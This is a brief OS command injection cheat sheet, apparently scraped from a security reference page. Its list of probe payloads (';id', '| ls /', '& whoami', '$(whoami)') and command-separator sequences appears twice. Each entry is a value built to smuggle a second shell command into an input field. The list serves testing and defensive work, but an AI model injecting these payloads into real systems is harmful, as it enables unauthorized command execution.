OS Command Injection
cheat sheet
Identification
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)Initial sequence
&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;References
Last updated
cheat sheet
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;Last updated